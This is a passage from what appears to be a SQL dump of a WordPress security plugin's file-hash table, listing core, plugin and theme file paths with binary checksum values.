5nh','',0,'?'),('�x^���Tvb`q�','wp-content/plugins/wp-cerber/assets/flags/zm.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��G���ya033^�\"',';�P��{���D���IK$q��:^��:>','',0,'?'),('�{�r�(7̐|K\n�.','wp-content/plugins/wp-cerber/assets/flags/pr.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���\\�j�޴�vŷ%','��2�@�)��~�t ]��:V��&� �','',0,'?'),('���;)���J+�Z�7f','wp-includes/wp-includes/js/wp-emoji.js',0,'*�����׶H;�q.�','*�����׶H;�q.�','�������O��)`5g�D?5F�!����','',0,'?'),('���I��ܶ�ް�o�','wp-content/plugins/wordpress-seo/css/dist/schema-blocks-1851-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\0f����������','��r\r�4a���Hyٔ�9@�ݢz����&','',0,'?'),('�����juGCtO���','wp-admin/css/colors/coffee/colors-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��u�%��X%	','1��xa!��4�:#�Aý���� }Kda��','',0,'?'),('���G�<m>`7i�8�','wp-includes/wp-includes/css/buttons-rtl.css',0,'i��ԝ]z~c6���g6','i��ԝ]z~c6���g6','�L�X橕f��\Z�tC5�i�fS�(�R�&�=�','',0,'?'),('��l�.H|S���{��','wp-includes/js/jquery/ui/effect-transfer.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','d.ɏJ˞��Kh<d�\nX','�������T4�&zl�k�c�������}�','',0,'?'),('��a��s��O���ʻ','wp-content/plugins/wordpress-seo/src/integrations/feature-flag-integration.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���xR��\\��-','�#�?t\"�_���	��I:\0\n���a�[�\"�','',0,'?'),('�����);���-','wp-includes/wp-includes/sodium_compat/src/Core32/BLAKE2b.php',0,'�z����ħ7�	�7V\Z','�z����ħ7�	�7V\Z','�p���#4�o�p�p8�^�۰�^�F�+�ף�)l','',0,'?'),('��|��V�\Zly�!j�','wp-content/themes/hitmag/inc/kirki/assets/vendor/selectWoo/js/i18n/th.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���������~�+y\Z��','�š��2�y�F�xkU����A.�FI��c�','',0,'?'),('���ISU`u���T��F','wp-includes/sodium_compat/src/Core/ChaCha20/IetfCtx.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�l�{�bOs�_a��>','m�n5��ߐ֞βgJ�\\�����3�����','',0,'?'),('�ʚ�{�(���\\i�7.','wp-includes/Requests/Exception/HTTP/431.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','e�-���.�ݼe���>','�ꅱ��/Y6_���w�pk�w���0���','',0,'?'),('��9L�Vr��ufb��','wp-content/themes/hitmag/inc/kirki/controls/views/number.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','[�W��Qމ�\0�K�','4b���{(\Z�\\�9�|�Ra=S�mp	�ގ\r^@�','',0,'?'),('��S%�ќ\"��r�!�','wp-includes/blocks/list/style-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�f���a�\'��g�-�','|�V �}�\r��+D^A�����$��(�ETU','',0,'?'),('��o��Sb�)_k�\r�(','wp-includes/wp-includes/js/wp-api.js',0,'@�BY�f��b�b2�lз','@�BY�f��b�b2�lз','�N�_���R\"T������%i�c��ő�	2&�H','',0,'?'),('��}�^72������','wp-includes/Requests/Exception/HTTP/415.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�j�zZ�,�)��+��','v%�_�\0�b$m�&`���(�=�m<�b\Zo0p','',0,'?'),('�\rK�-DR_6ĝҔ�','wp-includes/wp-includes/js/jquery/jquery.table-hotkeys.js',0,'7?�F5�sS5�7��,(','7?�F5�sS5�7��,(','J<��?Y������SuŪ�U&�\nNy�`TkL�','',0,'?'),('���an���V=Ty X�','wp-includes/SimplePie/Copyright.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','k��>�����ԪQ','�i��%�ܴ��E�^g���2�z,�@�Q��V','',0,'?'),('�$��b	���o�&��8�','wp-includes/blocks/button/editor.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','+����A���n�t�','�� 3�_����cK��$�1�p�h߰��:��^','',0,'?'),('�9��s\\�p�X�)H','wp-content/plugins/wordpress-seo/src/routes/abstract-indexation-route.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','/D�0_V�Qm�>t�','� 7&­����]�k�p�&���c7�����','',0,'?'),('�@�_@	*^���,�|n','wp-includes/wp-includes/js/dist/shortcode.min.js',0,'j����	Q�l�*,�I�','j����	Q�l�*,�I�','�� w6R�(�K�T%ni�1��0�����[r','',0,'?'),('�CV��%�����i','wp-includes/block-supports/border.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��.�DI�9�@ݵ]�\Z','��%&Q��QYBr������tqܰ����n�','',0,'?'),('�h#�L4�]�q^�3�k','wp-content/plugins/wordpress-seo/css/dist/metabox-primary-category-1851.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�}��\0��-�U_���','��PyC�)h��\Z.8�YV��{�����g','',0,'?'),('�v�a/�0M����	','wp-content/plugins/wordpress-seo/images/man_with_tablet.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ÕԻm����;�\"��','�V��{�%��Z��d0���1!���m�	�','',0,'?'),('�|� (��i��/H�','wp-includes/wp-includes/js/tinymce/wp-tinymce.php',0,'1_H�0���US��@h�','1_H�0���US��@h�','������_ؕ���N͞����1�*��ǜ��','',0,'?'),('�} �yT��Z�H�cDJ','wp-admin/js/custom-background.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�|+T��GTt��\0','�r�B~�<W5�9���[;]�ޓ5S��D���','',0,'?'),('��msœ13�oW6`�','wp-content/plugins/redirection/models/canonical.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\'�$��<��ZaY7���','�	�~��a=���\"`�3�XԠ���Bɖ���','',0,'?'),('����ZK�*%���','wp-content/plugins/wordpress-seo/vendor_prefixed/guzzlehttp/guzzle/src/Handler/CurlFactoryInterface.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��S���d1�A�\\�','�\\��Z~�\')צS9�V#&�{�k;����]���','',0,'?'),('��&�0�#��tg�3�Xw','wp-content/plugins/wp-cerber/assets/flags/ve.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','z���T�]=�l\rf>�g','%,%l���g\n�+\r�\"Svoޑ}\"����>�J','',0,'?'),('��T������gM9ڛ','wp-includes/wp-includes/widgets.php',0,'��AĢ<ݤ9�fK:','��AĢ<ݤ9�fK:','�6��-�Պ��涫9����W\"\'�|w�w~�E\n','',0,'?'),('��{�0l(Ʋu9,wS�u','wp-includes/js/media-audiovideo.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���_��XQ�����W�','H��a��ǁ��-F�|\0��N>�i7���*���','',0,'?'),('��� ,���֛U\\X�1�','wp-content/themes/twentytwentythree/styles/whisper.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','p\r	���\n���o','?G��t��C@�/ޫC��T��|ܳ@�T6@�','',0,'?'),('��)!)�6��>}�74','wp-includes/css/dist/block-library/style-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���s�/�Gf ��<','��(� 1������lr�q�F�F�Jqz�g&','',0,'?'),('��1\"�̰F+��\n��','wp-content/plugins/all-in-one-wp-security-and-firewall/images/notices/summer.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','O!����[�y\nP��i','w�w�F�f�~��?��,6���y����u��','',0,'?'),('���{eu�	I���','wp-content/themes/twentytwentythree/assets/fonts/inter/LICENSE.txt',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�����,\\�u����`�','�x�`��R#�G���Ed[qȟ��h�\nx�s��','',0,'?'),('���L��V�Y��*','wp-includes/js/plupload/moxie.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',')���,�A���S�N�*','�_w0N�Sk$���+[��i��~��\r��','',0,'?'),('����Pb%FD��n','wp-content/plugins/wordfence/js/jquery.qrcode.min.1647958122.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��Թ���Xp`me<','wP\0�p�zuYDS�z(W�ߥ��P�3$S����','',0,'?'),('��8Z�3�0�$�u','wp-content/plugins/wordfence/js/jquery.tools.min.1647958122.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�:-��Eՠx�$�B',',�4�~aT�lS �fQO	f���Tӵ��;��)','',0,'?'),('��\r�\n��#-&���','wp-content/plugins/wordpress-seo/admin/views/tabs/metas/post-types.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����WX�)�LXM�X�','�!!�2_��穭�M��z�]3���ߪ6�~��','',0,'?'),('� �A$ۤfC�N��37','wp-includes/query.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��\Zob�xdS�\Z��','S�,\n�d�<Nqg��?�L����%6r�`�','',0,'?'),('�(���ה�W�h@=a','wp-includes/images/smilies/icon_mad.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','V�!�@�c�0�S�','�������d[O:LJ�����jl}�q�','',0,'?'),('�7�0���,�		M','wp-includes/sodium_compat/namespaced/Core/Poly1305.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Qy���?�;�8�V\n�','\0�-��]뮳��XEt)�`��1�C�}Mr2�/','',0,'?'),('�;�*\04�S�;#B��w�','wp-content/plugins/wordpress-seo/lib/orm.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','R��RG�P�\n��.b7�','�ɼU�H�}WCJ_0��c<���/J_���c','',0,'?'),('�C�,ڦ�R1A�	X�','wp-includes/blocks/latest-posts/style-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','A�< ����ck 5�f','���)\r��\rK\Z@��_���ZZٔ��3��i�C','',0,'?'),('�E�H���!���h�<y','wp-includes/blocks/site-title/editor-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\"X�\"OK��9\0�','}	����k_[3�?_�Fx�a������','',0,'?'),('�P���\rv*ɡZ\\�','wp-includes/wp-includes/css/jquery-ui-dialog.css',0,'�b�G�-_f���kqT�','�b�G�-_f���kqT�','v�4�8p�nf��Z�H\"ռ\\�;j�R&N�','',0,'?'),('�g\Z��\\�\r�`=�m�','wp-content/plugins/wordfence/modules/login-security/classes/model/tokenbucket.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','P\r�L����{ǀ�','����VZ+��&�\r�Щ�U;�L)R�!ӵ�','',0,'?'),('�i���B�j����]','wp-includes/sodium_compat/namespaced/Crypto.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�G8�J+��	��z','>8���\'X�i�Ub�Gн�,<T`6��4Ѝ�','',0,'?'),('����v���ό�Y9�','wp-includes/ID3/getid3.lib.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','9���$��ֶ(��~','���SՃ�B�x+�v0h�ʉ�����1�','',0,'?'),('��\Z凚T�L�a�','wp-includes/wp-includes/sitemaps/class-wp-sitemaps-provider.php',0,'�dwi�+���M�U','�dwi�+���M�U','`ߨ=I\\�L����0Z��Y��a�g���5','',0,'?'),('���13-��a>\\�iw��','wp-content/plugins/wp-cerber/assets/flags/km.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�EL~\nC���B��vE','��`�a_j���n��V���stSlS[�(��,X','',0,'?'),('���X����H�o�v�','wp-admin/css/common-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Y�4�U��~�S��','��*\'0j�R����{�:�3�9��0=��I�','',0,'?'),('��!N��D�w�`��[�','wp-includes/js/jquery/ui/dialog.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ʊ�y�+ԝRg� ]\'�','��^��FJ�K�ɹ^	�D��0�:�\\�(','',0,'?'),('���Xp����~0D','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/HSalsa20.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�W�oe�~��oB2�_;','5�q��SrL�]�OX����sq����+l<��ɒ','',0,'?'),('��֗]NR���S{qv?�','wp-admin/css/wp-admin-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',',*i����[p]��<','r5S�E�?29/�)��_�PJv�Vh���R�','',0,'?'),('����7��6�ɫ�','wp-includes/wp-includes/class-wp-object-cache.php',0,'�n̩$�������/V','�n̩$�������/V','���O�\Zm7l���W���2��m�_/2��$�','',0,'?'),('��\Z,z���Ґ�U�','wp-includes/rest-api/endpoints/class-wp-rest-terms-controller.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���Ġ��J���(��Xm','�ʏ+@w0�&��U|���%�OB`�\n<\ZS','',0,'?'),('��O܎$8��J�e��','wp-content/plugins/wordfence/models/scanner/wfScanner.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���X�)�f��.�T�','3�/x\"��W���h@���fP\0]������','',0,'?'),('��� k���歮0�-�','wp-content/plugins/wp-cerber/assets/flags/sv.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�X�EOH�~U��޾','�cX�-}x��la���ZHH��C�Tx��u(�&','',0,'?'),('���UFq���$�*:','wp-content/plugins/wp-cerber/assets/flags/fm.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','H���΂!$\n�n��(','�乲�!����%�����j�d��ۖ�+��','',0,'?'),('��*v�<�TC�U�XJn','wp-includes/blocks/column/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','6��6� �W��X�b','��d���O�֣����=¿_�RAW�E��E�','',0,'?'),('�����n�E��','wp-content/plugins/all-in-one-wp-security-and-firewall/css/wp-security-site-lockout-page.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��nOΨ�J���z�<','ԥ6Wi��� F4�hd��4��ˡV8�\0ݟ�','',0,'?'),('�V�܂0\0U�`�5C>','wp-includes/css/dist/components/style-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���Z=3	V�����','����w�m˃K�,6��2y�և�\\�қn#�Z','',0,'?'),('�\Z� �R����[�\'�>','wp-content/plugins/wordfence/css/images/ui-icons_777620_256x240.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�J�\\c7�y�x�гl','�~��qV����*\'�1�����]3�^�����m','',0,'?'),('���S��D�z��','wp-includes/wp-includes/class-wp-list-util.php',0,'�}� ��Sӕvl�T@','�}� ��Sӕvl�T@','���Ԉ������?1l�\Z� ���ug�\',��','',0,'?'),('�$�����j�X�])D:','wp-load.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','}��3^���z./���','.Հ���+_�Kڳ�O�;?��8\'���7_�da','',0,'?'),('�%��Ob��P,ts','wp-content/themes/hitmag/fonts/fontawesome-webfont.woff',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��nq*��ZF�)2�','�&4\"\rQ�jX�mN\"��?P�o��\\��?���','',0,'?'),('�2�\\�17Հ�wi�{','wp-includes/js/dist/vendor/wp-polyfill.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','䕤p�>�1��c�]-9','^�3qr�׮2�\\H�3↳ѓ ����5 \"','',0,'?'),('�<�V���htج�','wp-includes/wp-includes/js/tinymce/plugins/paste/plugin.min.js',0,'dX�������z҆֫','dX�������z҆֫','�f��\0W{?q��������Ul�P�֫c8','',0,'?'),('�@��Ĕ�l!$�F�\Z~�','wp-includes/blocks/code/editor.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\\JNPT-�7����]�','���<�/��lU0*ߥW�$V����vC]���4�','',0,'?'),('�H_��_��z��W�A','wp-includes/wp-includes/class-wp-customize-panel.php',0,'��o�Vj�\'WB{.��u','��o�Vj�\'WB{.��u','�f)%�|u��8Jo�A�tD4�L�+����^','',0,'?'),('�H�)������jH�j','wp-content/plugins/wordfence/modules/login-security/classes/model/text/javascript.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','V�\'B�l�If���\"c','��O$��U?��\nR��y���V�=�T���Z','',0,'?'),('�Nsf�#�@Q;�;�{̻','wp-includes/blocks/query-pagination-numbers/editor-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','O�6�ө��(�P�Q7�','^`���wPz��l���\n�̓u\0k��','',0,'?'),('�c��O��-��+oe','wp-includes/blocks/block/editor-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��,�Z�q�3)���','0&#��b�93LC\0����vX��<cɘ�TX','',0,'?'),('�j%M�ɍ��p)Z��','wp-admin/images/generic.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����\'�[#98!�','�{u���K[g͆Ex�{�:߼��lͨG��','',0,'?'),('�n�@G�n/��\0a<i','wp-content/plugins/wordpress-seo/admin/menu/class-menu.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���H�nnJ:(��X','�\"N\\�m\"�U�ªNL9GL�YE�*.�Z͙�R>','',0,'?'),('�q�J+�b>�Z�<B!��','wp-includes/wp-includes/css/wp-auth-check-rtl.min.css',0,'���jv�sZ��ܻ&h�','���jv�sZ��ܻ&h�','F�V=&G\"�r��\rF�p��\nJ�ݣ�=՟3�','',0,'?'),('�vB�?=�<��p.�','wp-content/plugins/wp-fastest-cache/templates/update_now.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�O�������u��g&','^�̈F}�%U�I�vCW�n��1b�)#E�x�','',0,'?'),('�x���D��hd{jdpx','wp-content/plugins/redirection/locale/redirection-pt_BR.po',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','-�\Z��ڌE�3d�>!','���n�\Z_�/��.�wܻ���f�j�hcN}','',0,'?'),('�~Cm���\Z��GL��9','wp-includes/wp-includes/customize/class-wp-customize-custom-css-setting.php',0,'��^Tˮ,�\"A\n�3���','��^Tˮ,�\"A\n�3���',',���J�v�0�D�wB��t�fDD�H���Dgo','',0,'?'),('���|j4��8K�H,�','wp-content/plugins/wordpress-seo/src/integrations/third-party/elementor.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','8E�\Z/�GDU@�p','�������ov@m)o��P�����C\\���%G','',0,'?'),('���\\�Z ��i�6R�','wp-content/plugins/wp-smushit/core/class-settings.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�a�%I��� Vj!�Ӟ','L��Y�wp2��mm�lՉ�Z4Ep�>~�!�x','',0,'?'),('����_.*{zQ�%�V','wp-includes/wp-includes/js/media-grid.min.js',0,'3�a\"��Å�\Z}n�K��','3�a\"��Å�\Z}n�K��','Zm��+�w��Ⱦ���d������2�D','',0,'?'),('��RKQ�5v�-��	��','wp-includes/css/dist/edit-post/style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','1\0Ĵv�\'(6T-W�','��\'���	+�{���?΃r��u���da5�','',0,'?'),('�¦P�W�z�z�N�','wp-includes/wp-includes/js/dist/core-data.js',0,'�+�;Q��z@�?#�_�','�+�;Q��z@�?#�_�','�2�Fsc�jp{�ѳtG��1D�Y0�Ƶ�QV�@��','',0,'?'),('��q��뻣D(���j��','wp-includes/blocks/list/style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�f���a�\'��g�-�','|�V �}�\r��+D^A�����$��(�ETU','',0,'?'),('���;���I)6�OH�','wp-includes/wp-includes/js/dist/format-library.min.js',0,'9���h���d6��.{�','9���h���d6��.{�','�H��? �pq+���t?��l��U��n\'�o�Q�','',0,'?'),('��;(Xp`ҙ��pݷ','wp-includes/js/plupload/handlers.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�b/�3z)�<�l�','Z5�X�<���pb+ʅ�d$��]V�x]','',0,'?'),('�ܗfT�9!��4.ٰ�','wp-content/plugins/wp-cerber/assets/flags/mu.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','O�7�{��@��v�','��\"x&�rp��� U��M?Fi�+��h�','',0,'?'),('�憓����w��\n�[�','wp-content/plugins/wordpress-seo/css/dist/select2/select2.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�9Ci��E���e6','�}�G���A! ��hW�\'�h1�X�L�#M���#','',0,'?'),('��6{$o�S�����','wp-includes/wp-includes/css/customize-preview.min.css',0,'��b���Sb�s��\"','��b���Sb�s��\"','ߌ��I�R�\\Ĺ�e��z3�QsC����Q�','',0,'?'),('��t�0�g�a�/��','wp-includes/js/tinymce/skins/lightgray/fonts/tinymce-small.woff',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','~��-����x\'�	','��{ڋ��N�o��#X�+Xe\'�����_����>\Z','',0,'?'),('�\n�qo�qZVyX��9','wp-admin/includes/menu.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','{��\Zf���#O+�Z�','(�6s\\������ӑ�I�~TJ�v��E!�T?\'�','',0,'?'),('�Z�{g�}�f�-��0\n','wp-content/plugins/wordpress-seo/vendor/composer/autoload_classmap.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Xan� MO�fT+�w7�','�2Wt�™�x>nb����|\Z_gR s���s�','',0,'?'),('��Z{_��3�X\0R','wp-content/plugins/wordpress-seo/src/presenters/schema-presenter.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�(��\n��v��8�0%','ٝE��yM�7gry�YWe�QZ`9Kݭ���','',0,'?'),('�\'8��������\r','wp-content/plugins/wp-cerber/assets/flags/cm.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','S�q�����&�','�d�h�I�ӌ����u�]9��(�7\'�ρ0-B��','',0,'?'),('�)q�\"��ff�\nlߩ|','wp-content/plugins/wp-cerber/admin/cerber-admin-settings.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','X�ݎ���5�v�Rn�(','6�g�C�?������������:fxa$0�WL','',0,'?'),('�;�5jԽ]�O��R��','wp-content/plugins/wp-smushit/app/assets/images/smush-lazyloader-2.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��YO��\'��kԱ��x�','<��K�4ٝ��.��$�yn \0��\r��','',0,'?'),('�=<�O����ܘ���','wp-content/themes/twentytwentythree/assets/fonts/dm-sans/DMSans-Regular.woff2',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���Z��^�]F#��','|���_�ؘ�=�>H{i������z˸�','',0,'?'),('�?�5#i>���W��t','wp-content/themes/hitmag/inc/kirki/field/class-kirki-field-color-alpha.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��r�BI��Ƣ���','�>.�T.�3P�}1٣f�S}Ƃ��\'OA?s','',0,'?'),('�G.Z�Սo����ykЃ','wp-content/plugins/wp-cerber/assets/flags/pe.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Ô5gC��i�E8 >�','ԅ8ښ��=�&�9�`��]&S�?1�.#f����','',0,'?'),('�QlݠI���ve]r�%','wp-includes/wp-includes/js/zxcvbn.min.js',0,'|	���#PV	/{�M�_','|	���#PV	/{�M�_','v�XI�9��n�1e�6��C�\\�.p+�\"��K�','',0,'?'),('�`�@�����YE�!','wp-includes/Requests/Transport/cURL.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��w%Z�*�H���','�~����c�yh�G�K��S��huP�����m�(','',0,'?'),('��Ư	\'CԻ��ګ\Z','wp-includes/images/admin-bar-sprite.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','S���:�W���^','��rN!�`VO�c��K��viՀ{Fn\Z��le','',0,'?'),('��4��#հ�}��','wp-content/plugins/wordfence/modules/login-security/views/manage/code.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','/�j-�W�.�{��@','�i%X�Y`FmZ���E^ab}r�_E�����3�','',0,'?'),('����l����`b=���','wp-content/plugins/wordpress-seo/src/integrations/watchers/indexable-date-archive-watcher.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\"Qb�H�2�n�E��Q','�3ƕ?��k�&�#�̋��٘1�‰��j�','',0,'?'),('���>�\0� ���z�\Z','wp-includes/blocks/navigation/editor-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�&�d>m�p�k��&x�','���+2��@	U8�l{�C�wt�y� Q�n�\Z!)','',0,'?'),('��\"�Z0\0ؿe�Ԧp�','wp-admin/css/admin-menu.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��_=sW�N�p0R[U�','�bq�F3�/ԙ���!��t��.Kp�}��','',0,'?'),('���>*v�mqc���y','wp-content/plugins/wp-fastest-cache/images/no-image.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','l!`3���ah}?�F�','?8\\.	f�V��d�rr��\"�K	���$�A','',0,'?'),('����\"8Y��74�O<','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/Util.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','di�BD�J���D�5�O','N�a���i�B���\r��AO]���@�P��','',0,'?'),('����x8[!>�X','wp-admin/includes/class-wp-users-list-table.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','y��˝�\\�@7�zaz','c�E��?vS���}��A����^�=.�N��=','',0,'?'),('��Wm�V�1��N�\"��','wp-includes/wp-includes/js/dist/dom-ready.js',0,'�5�N�M8�![��c','�5�N�M8�![��c','O\\�Ű|�~2Zce��L\"�kOM�s�g(�\Z�','',0,'?'),('��$���W	�_j�N','wp-includes/wp-includes/js/dist/vendor/wp-polyfill-element-closest.min.js',0,'���H0�c;`���W&','���H0�c;`���W&','2A]�ڛ\\e��WߦkZ�s���c�<�`�d)�','',0,'?'),('��6�<�R���JJ�','wp-content/plugins/wordpress-seo/vendor_prefixed/league/oauth2-client/src/OptionProvider/HttpBasicAuthOptionProvider.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����#��ٍ���74','�S�P��\0T�\"�q��1�������ϸ\0\0�J','',0,'?'),('�H����޼���#�','wp-includes/wp-includes/widgets/class-wp-widget-pages.php',0,'�J�E,��ߓ%_�','�J�E,��ߓ%_�','<6�8��1J�ߧr(;�c�?@�|uR�\nŞ�','',0,'?'),('�SzʀU�\n����','wp-content/plugins/wordpress-seo/admin/formatter/interface-metabox-formatter.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�!�\Z؍�o��','��U�/�����yI����^�:?Rp$��Rs1��G','',0,'?'),('��ue�{X�1���','wp-includes/sodium_compat/src/Core32/Poly1305/State.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','W���o6b�;��W','�y�u<��:�������u��d	��a�>�','',0,'?'),('�x>ơ?.Rvǜ��\'','wp-includes/wp-includes/js/crop/cropper.css',0,'ky5�ni*M(��','ky5�ni*M(��','�ٸ�T��ޝO���wL��y=}�gTl������','',0,'?'),('�ON�\"OBv_\n(}ޗ','wp-includes/wp-includes/js/hoverIntent.min.js',0,'�x�m���\n8��	�','�x�m���\n8��	�','�)�K���%A�Z&�y�`M��U!�i:A�[�','',0,'?'),('�����T1\n�h��','wp-content/themes/hitmag/inc/customizer/custom-controls/control-category-dropdown.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�2�%�	�@>��a��','��9*�d��աЃ�Ͱ��Y�����cH�W','',0,'?'),('�!@k��t��))]h','wp-content/plugins/wp-smushit/core/external/plugin-notice/assets/images/plugins-defender.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','?`Ym��#�,���C��','��G��/��C)mF*O�%�䖯y���aw7!','',0,'?'),('�-�l���s�j�|','wp-includes/wp-includes/js/dist/compose.min.js',0,'i\0 ��Q�a�5���?','i\0 ��Q�a�5���?','��z~�Յ\0>�����n�ۣ�3\Z؉:C�\Z�','',0,'?'),('�/��0)���\Z�','wp-content/plugins/wordfence/views/scanner/issue-database.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��S��>���Z����G�','���\n��#Pw3Id��}͇%�J���j�U��+','',0,'?'),('�6��?��XlqT:�	','wp-content/plugins/wordpress-seo/js/dist/select2/i18n/id.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','&��(EMCZ�c���','��Sσf!m/7�e�yxI��M�lmMDm�?�0','',0,'?'),('�7�݆���㮪N�;�','wp-content/plugins/wordpress-seo/src/deprecated/admin/onpage/class-onpage.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�>z�o�s\\[�����\"','O�E�usnp�6*Fv]>�0�WyN 